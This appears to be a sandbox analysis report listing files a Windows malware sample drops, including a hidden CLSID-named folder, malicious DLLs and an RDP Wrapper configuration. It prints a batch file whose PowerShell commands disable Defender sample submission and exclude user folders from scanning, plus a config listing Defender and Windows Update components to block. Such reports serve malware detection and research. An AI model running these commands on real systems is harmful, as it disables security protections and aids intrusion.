SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.277217301921545
Encrypted:	false
SSDEEP:	1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
MD5:	D0F0423AEEE6B6FF6754D860603D46D0
SHA1:	A06F3B9605B3398BA68154DA39ADF26DDEE41743
SHA-256:	81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
SHA-512:	C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1929
Entropy (8bit):	5.478004922553954
Encrypted:	false
SSDEEP:	48:CFdHr+54yclDEDsXcm9FL4gEu5ZR5+sR5CdLh5HR5OKXbeD:idHxNBJ9VTgOD
MD5:	42A1A5C102E9A27C3EC501E05D386BCB
SHA1:	0B260831794AE2CB3E44F751203ABB332800E5A2
SHA-256:	F08AF5F1666FC530AE8B181C3D792C409842B965E2D27E7940A9CAD59F6C41E2
SHA-512:	8E49E45F24295C69A42A747AF1162F6FE570FE80770292666C5F41F82DE9613AD4A3C86E958A3D6FAC7F36B99BFFDAE585F3906E819213D6F2A2B764717A0E2D
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffda557e1cc)..[I] (tcp_connect) -

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2290767543196575
Encrypted:	false
SSDEEP:	1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
MD5:	4C086C8F48C4D0F8C20410E60340AEC9
SHA1:	77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
SHA-256:	0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
SHA-512:	CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	441513
Entropy (8bit):	5.449545529389614
Encrypted:	false
SSDEEP:	768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
MD5:	5FCB4B6362E04A8D1C6ECD33AD246FB9
SHA1:	E198D3E81C4B8527451133BCEAFA799D2115A8BB
SHA-256:	060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
SHA-512:	B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg

Download File

Process:	C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
File Type:	data
Category:	dropped
Size (bytes):	10451376
Entropy (8bit):	6.708065758846917
Encrypted:	false
SSDEEP:	196608:diRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEhB:diRsCKCsU1CPwDvt3uFd9CMEX
MD5:	312704A6232D74733DE04C6E00F8CF21
SHA1:	2B4820AC82C5B851464D6563FA6EA0CB3E3629C2
SHA-256:	8D11890F2B70BA2ABB4B017B05F3BB1D20ECA6AD3EB84F0251E0857C77682C9B
SHA-512:	5C32B9A8267C57CE640E7612BDECD7D7EC67F4E0AB48DD97A53373D220765AB234BC28779F524E788E1E03D8857CCD7755A22F19E1A34AE36FD6F33444016F01
Malicious:	false
Preview:	_W&T....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B.....................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	10639360
Entropy (8bit):	7.4147455331909855
Encrypted:	false
SSDEEP:	196608:PE1LTxbO313norADHLHhHiVulZ/KHNV4G:PyxbOFC8b/KtV4
MD5:	7D1755E8E41A6C2F08D2FAEFFDF9DAD1
SHA1:	C04D89F1054F2EE34B548126A5ADD4EEE4751AE4
SHA-256:	44CF4321C138C4CACECC95DEBA735F508C96049E7F0E8F0538684DC4F0C1E9A5
SHA-512:	B099238838B0D8B258529126B3C279AC735FEFF778D52C3117EB3CD587267A145A09BC1317FB412B2C810EA8B2232A8218FE459E33AC99F9B48DECFDC62E4816
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....T.................@...................................a.....`... ..............................................................@..d...........................................`/..(....................................................text...(...........................`..`.data.............................@....rdata...^......`.................@..@.pdata..d....@.......(..............@..@.xdata.......P.......2..............@..@.bss....p....`...........................idata...............<..............@....CRT....`............R..............@....tls.................T..............@....reloc...............V..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00ym1pnm.ssx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zio5adv.3vh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1n3qy4sb.f42.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35xbrn40.2mt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bkvhwpf4.qmh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3jzqaoh.5sd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvnblqdp.d2h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lee4a1bd.uov.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nypkvfm0.dfp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tsbblmzw.qwi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uubwh2sd.2hg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zp4wjidm.dsq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.298274541598319
Encrypted:	false
SSDEEP:	1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
MD5:	319865D78CC8DF6270E27521B8182BFF
SHA1:	716E70B00AA2D154367028DE896C7D76C9D24350
SHA-256:	A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
SHA-512:	78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....\|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................\|..............@....reloc...............~..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	259
Entropy (8bit):	4.933902901538645
Encrypted:	false
SSDEEP:	6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
MD5:	261A842203ADB67547C83DE132C7A076
SHA1:	6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
SHA-256:	49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
SHA-512:	7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
Malicious:	true
Preview:	@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1

C:\Users\user\AppData\Local\Temp\installer.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3747
Entropy (8bit):	5.50060725558016
Encrypted:	false
SSDEEP:	96:i6BJ9VTDT0HU0Hn0H1eA0Hu0H+kQHR3wPD07I0HNVHGHX0HltHl:vDT3T000H08A0O0TQxAPD07I0tVm30Ff
MD5:	D57E5331C652806BFFD879DA58800478
SHA1:	BA3947EDB5ABECB6A02D9970AACD45C8174280E5
SHA-256:	086497874D081693AE45086C953AA1107EEEC029249FFC34736AF1590E453A4D
SHA-512:	02261E32F0D8E6AAC7ABF6ECCFDE9893225A7BAE625B622DDC9B0F693C1C2C78547EDCC57D0E9C997329B9DACDFE4882F34A45D3E203CBA481FFB33586E633B7
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffdb4390000)..[D] (module_get_proc) -> Done(hnd=0x00007ffdb4390000,name=RtlGetVersion,ret=0x00007ffdb43ce520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=8062e644)..[I] (sys_init) -> Done(sys_uid=c76a8f088062e644,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea

C:\Users\user\AppData\Local\Temp\wfpblk.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe
File Type:	Generic INItialization configuration [svc]
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.692426693515089
Encrypted:	false
SSDEEP:	3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
MD5:	E025B58CB2D118FAFAE00850EE91C5F9
SHA1:	DD23CE328F593AF74455F2C2F805B662466A1205
SHA-256:	897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
SHA-512:	5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
Malicious:	false
Preview:	[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..

C:\Users\user\AppData\Local\Temp\wfpblk.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.146697675692133
Encrypted:	false
SSDEEP:	384:6bbEbNQ6s69WS8vv88o888888888888888j888888888888e88888088888888AB:6bbEbNQ6s69WS8vv88o888888888888G
MD5:	737D7DD6A6C89197004B5D6DF84F7F89
SHA1:	AAF5F200FBD5DA4C6F7C5A74135A543F6A087424
SHA-256:	2E0E497C9FC304F7CB6481DAAA47C668623C50B8418E041C066DF1FE06EA1C2C
SHA-512:	0ECF85D9FE1B0FF6BC7A0E0157F73D0D6A1DEEEAC253187439D743A4CEB61DB7D5C5A1D575A6E1B6EF1930CE8D700A93C07760D8E5A7262C3E162BAF3F76781F
Malicious:	false
Preview:	[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_

